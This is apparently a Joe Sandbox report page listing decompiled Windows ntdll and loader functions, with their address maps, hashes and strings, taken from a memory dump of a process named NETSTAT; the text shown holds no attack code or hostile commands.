Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 41c20fdaa500a6c08ccbfd515e4f10119192e31949c95583a20a299faf2c7385
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 02518B71544710AFC320DF29C840A6BBBF9FF48714F00892EF99997690E7B4E944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02EE3540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02EE3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x2f5d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E02EA0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E02EE3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E02EAFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E02EE3540;
						E02EAFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E02EBDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E02EF0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E02EA97C0();
					}
					return E02EAB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E02EE3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E02EE3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E02EAFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E02EA9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E02EE3787(_a4,  &_v352, _t80);
						}
					}
					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E02EA95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x02ee3552
0x02ee355a
0x02ee355d
0x02ee3566
0x02ee3567
0x02ee357e
0x02ee358f
0x02ee35a1
0x02ee35a5
0x02ee366b
0x02ee366b
0x02ee366d
0x02ee3672
0x02ee3679
0x02ee3685
0x02ee368d
0x02ee369d
0x02ee36a7
0x02ee36b8
0x02ee36c6
0x02ee36c7
0x02ee36dc
0x02ee36e1
0x02ee36e7
0x02ee36e9
0x02ee36e9
0x02ee3703
0x02ee3703
0x02ee35b5
0x02ee35c0
0x02ee35c4
0x00000000
0x00000000
0x02ee35ca
0x02ee35d7
0x02ee35e2
0x02ee35e6
0x02ee35e8
0x02ee35f5
0x02ee35fa
0x02ee3603
0x02ee3604
0x02ee3609
0x02ee360a
0x02ee3612
0x02ee3613
0x02ee361e
0x02ee3622
0x02ee3628
0x02ee362f
0x02ee362f
0x02ee3636
0x02ee3638
0x02ee363b
0x02ee3642
0x02ee3642
0x02ee3636
0x02ee3657
0x02ee3657
0x02ee365c
0x02ee3662
0x02ee3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 02EE358F

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: 769be367ae93394bb556768594c316cc0e5d1e14d6275c4cee16f01e5e0983c9
Instruction ID: 68fdbdd858646468adad16faec29f8b8198e4713dad95cd50b856b770a7bc2f0
Opcode Fuzzy Hash: 769be367ae93394bb556768594c316cc0e5d1e14d6275c4cee16f01e5e0983c9
Instruction Fuzzy Hash: E84143F1D4052D9BDF21DA60CC81FEEB77DAB44718F0095E5AA09AB240DB319E88CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02F305AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E02F305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E02F307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E02EA9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E02F2A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E02F2A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E02F31293(_t79, _v40, E02F307DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E02E87D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E02F2138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x02f305c5
0x02f305ca
0x02f305d3
0x02f306db
0x02f306db
0x02f306dd
0x02f306e3
0x02f306e3
0x02f305dd
0x02f305e7
0x02f305f6
0x02f30600
0x02f30607
0x02f30610
0x02f30615
0x02f3061a
0x02f3061c
0x02f3061e
0x02f30624
0x02f30625
0x02f30627
0x02f30628
0x02f30631
0x02f30640
0x02f3064d
0x02f30654
0x02f30654
0x02f30631
0x02f3066d
0x02f30674
0x00000000
0x00000000
0x02f30692
0x02f3069e
0x02f306b0
0x02f306a0
0x02f306a9
0x02f306a9
0x02f306b8
0x02f306d6
0x02f306d6
0x00000000

Strings

`, xrefs: 02F30633

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 3effba9d14f0eae00abfe1d4b0f4e3a93e361e3f12a1b1b979e19af3e0d85123
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 13311332600355ABE711DE24CC44F9777DAAB84798F04422AFA58AB2C0DB70E904CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02EE3884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E02EE3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E02EA9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L02E84620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E02EA9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x02ee3893
0x02ee3896
0x02ee3899
0x02ee389f
0x02ee38a0
0x02ee38a4
0x02ee38a9
0x02ee38ac
0x02ee38ad
0x02ee38ae
0x02ee38af
0x02ee38b1
0x02ee38b4
0x02ee38bb
0x02ee38bc
0x02ee38bd
0x02ee38c4
0x02ee38c8
0x02ee38ca
0x02ee38ca
0x02ee38d5
0x02ee393e
0x02ee3940
0x02ee3942
0x02ee3952
0x02ee3954
0x02ee3961
0x02ee3961
0x02ee3967
0x02ee396e
0x02ee396e
0x02ee3947
0x02ee394c
0x00000000
0x02ee394c
0x02ee38ea
0x02ee38ee
0x02ee38f8
0x02ee38f9
0x02ee38ff
0x02ee3900
0x02ee3902
0x02ee3903
0x02ee390b
0x02ee390f
0x02ee3950
0x00000000
0x02ee3950
0x02ee3915
0x02ee391d
0x02ee391d
0x02ee3922
0x02ee3926
0x00000000
0x02ee3928
0x02ee392b
0x02ee392b
0x02ee3935
0x02ee3937
0x02ee3937
0x00000000
0x02ee3935
0x02ee3926
0x02ee38f0
0x00000000

Strings

BinaryName, xrefs: 02EE38B4

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: eb85a246b4d650d64cfe9856ee0d331a842db37fad90c3563e6078a25dda6170
Instruction ID: c812652052fe3d07437f4256c1fbb009a8492ee71cd6d52d522ec05c12260daf
Opcode Fuzzy Hash: eb85a246b4d650d64cfe9856ee0d331a842db37fad90c3563e6078a25dda6170
Instruction Fuzzy Hash: F6312472980509BFDF15DA58C941E7BB774EF90724F11D1A9AD1AA7280D7319E00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E9D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E02E9D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x2f5d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E02E84120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E02EAB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E02EA98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E02EA95D0();
					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x02e9d29c
0x02e9d2a6
0x02e9d2b1
0x02e9d2b5
0x02e9d2b6
0x02e9d2bc
0x02e9d2bd
0x02e9d2be
0x02e9d2bf
0x02e9d2c2
0x02e9d2c4
0x02e9d2cc
0x02e9d384
0x02e9d34b
0x02e9d34f
0x02e9d350
0x02e9d351
0x02e9d35c
0x02e9d35c
0x02e9d2d6
0x02e9d2da
0x02e9d2e1
0x02e9d361
0x02e9d369
0x02e9d36d
0x02e9d2e3
0x02e9d2e3
0x02e9d2e3
0x02e9d2e5
0x02e9d2ed
0x02e9d2f5
0x02e9d2fa
0x02e9d302
0x02e9d303
0x02e9d30b
0x02e9d30f
0x02e9d313
0x02e9d318
0x02e9d31c
0x02e9d320
0x02e9d379
0x02e9d37d
0x00000000
0x00000000
0x02edaffe
0x02edb001
0x02edb011
0x00000000
0x02e9d322
0x02e9d322
0x02e9d330
0x02e9d337
0x02e9d35d
0x02e9d339
0x02e9d33f
0x02e9d38c
0x02e9d38c
0x02e9d33f
0x02e9d349
0x00000000
0x02e9d349

Strings

@, xrefs: 02E9D303

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 190299b192dce47669d4ec4f258b058fcbbd33f1cd5a6ca276c6b1f314d4dda3
Instruction ID: c4fb895bd8fa647d7567e67cf47203a449f5c4989f827488111c15cdf4895f76
Opcode Fuzzy Hash: 190299b192dce47669d4ec4f258b058fcbbd33f1cd5a6ca276c6b1f314d4dda3
Instruction Fuzzy Hash: DA31B3B15883159FC711EF28C980AAFBBE8EB85754F00592EF99883210D734DD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02E71B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E02E71B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E02EABB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E02EAA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E02EAA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L02E84620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x02e71b8f
0x02e71b9a
0x02e71b9c
0x02e71b9e
0x02e71ba3
0x02ec7010
0x02ec7010
0x00000000
0x02e71ba9
0x02e71ba9
0x02e71bae
0x00000000
0x02e71bc5
0x02e71bca
0x02e71bcf
0x02e71bd0
0x02e71bd1
0x02e71bd2
0x02e71bd6
0x02e71bdc
0x02e71be0
0x02ec6ffc
0x02ec7000
0x00000000
0x02ec7006
0x02ec7009
0x02ec7009
0x02e71be6
0x02e71bec
0x02e71c0b
0x02e71c0b
0x02e71c0c
0x02e71c11
0x02e71c12
0x02e71c15
0x02e71c1b
0x02e71c1f
0x02e71c31
0x02e71c33
0x02ec7026
0x02ec7026
0x02e71c21
0x02e71c24
0x02e71c24
0x02e71bee
0x02e71bee
0x02e71bf2
0x02e71c3a
0x02e71bf4
0x02e71bf4
0x02e71c05
0x02e71c05
0x02e71c09
0x02e71c3e
0x00000000
0x00000000
0x00000000
0x02e71c09
0x02e71bec
0x02e71be0
0x02e71bae
0x02e71c2e

Strings

WindowsExcludedProcs, xrefs: 02E71BC5

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 0b8805b79ca0880cfa8affe8a9aae1301c9ae9b8135fa7394b37e4f77b7207ad
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 7321D636581328ABCB259AD58940FDBB7ADAB80668F15D469BD089F200D730D901EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E8F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E8F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x02e8f71d
0x02e8f722
0x02e8f726
0x02ed4770
0x02e8f765
0x02e8f769
0x02e8f769
0x02e8f732
0x02ed477a
0x00000000
0x02ed477a
0x02e8f738
0x02e8f73a
0x02e8f73c
0x02e8f73f
0x02e8f746
0x02e8f778
0x02e8f7a9
0x02e8f7a9
0x02e8f754
0x02e8f75a
0x02e8f75d
0x02e8f75f
0x02e8f761
0x02e8f76f
0x02e8f771
0x02e8f771
0x02e8f76f
0x02e8f763
0x00000000
0x02e8f763
0x02e8f77d
0x02e8f7a3
0x02e8f7a5
0x00000000
0x02e8f7a5
0x02e8f77f
0x02e8f782
0x02e8f784
0x02e8f786
0x00000000
0x00000000
0x00000000
0x02e8f788
0x02e8f748
0x02e8f74d
0x02e8f78d
0x02e8f793
0x02e8f7b7
0x02e8f7bc
0x00000000
0x02e8f7bc
0x02e8f798
0x00000000
0x00000000
0x02e8f79d
0x02e8f7b0
0x00000000
0x02e8f7b0
0x02e8f79f
0x00000000
0x02e8f74f
0x02e8f74f
0x00000000
0x02e8f74f

Strings

Actx , xrefs: 02E8F73F

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: ae4621f5fbdeed2d204b5cd36fde2ef66b046146ea6062ed0158c2cda4b1805b
Instruction ID: dcf2439fca7433b51ae7effdd07c2aa2a76d16a3072e62d8e949225b3764393f
Opcode Fuzzy Hash: ae4621f5fbdeed2d204b5cd36fde2ef66b046146ea6062ed0158c2cda4b1805b
Instruction Fuzzy Hash: 4B11E6347E46028BF7246E1DC4907767295AB9522CFA4E52AE4EDCBB90DB76C801C340

Uniqueness

Uniqueness Score: -1.00%

Function 02F18DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E02F18DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x2f40d50);
				E02EBD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E02EF5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L02EBDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L02EBDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E02EBD130(_t34, _t39, _t40);
			}

0x02f18df1
0x02f18df1
0x02f18df1
0x02f18df1
0x02f18df1
0x02f18df1
0x02f18df3
0x02f18df8
0x02f18dfd
0x02f18e00
0x02f18e0e
0x02f18e2a
0x02f18e36
0x02f18e38
0x02f18e3c
0x02f18e46
0x02f18e46
0x02f18e36
0x02f18e50
0x02f18e56
0x02f18e59
0x02f18e5c
0x02f18e60
0x02f18e67
0x02f18e6d
0x02f18e73
0x02f18e74
0x02f18eb1
0x02f18ebd

Strings

Critical error detected %lx, xrefs: 02F18E21

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: a7830fe668b9ce3b28c381af62b486e7dfaa38692c5a3b9486275ca45791ea99
Instruction ID: 79cbd1f99ea491d7660c49b98d46f55d04d9344dc7430ac23cda63efd0a9b771
Opcode Fuzzy Hash: a7830fe668b9ce3b28c381af62b486e7dfaa38692c5a3b9486275ca45791ea99
Instruction Fuzzy Hash: 0211AD75D54348DBEF25CFA48A057DDBBB1BF04394F20926DE669AB282C7704602CF14

Uniqueness

Uniqueness Score: -1.00%

Function 02EFFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02EFFF60

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 682055e7acc7c92b0a3406ea6d7ce0e3fd4c35fbd23337e090c682bb07eaf748
Instruction ID: eb86ac02a89d11490f44773f7e95030c06cd925409f0e58048a937cbb855df5c
Opcode Fuzzy Hash: 682055e7acc7c92b0a3406ea6d7ce0e3fd4c35fbd23337e090c682bb07eaf748
Instruction Fuzzy Hash: 7711ED72990248EFEB62EB50CD48F98BBB2FF08718F15D454F7086B6A0C7799950CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02F35BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E02F35BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
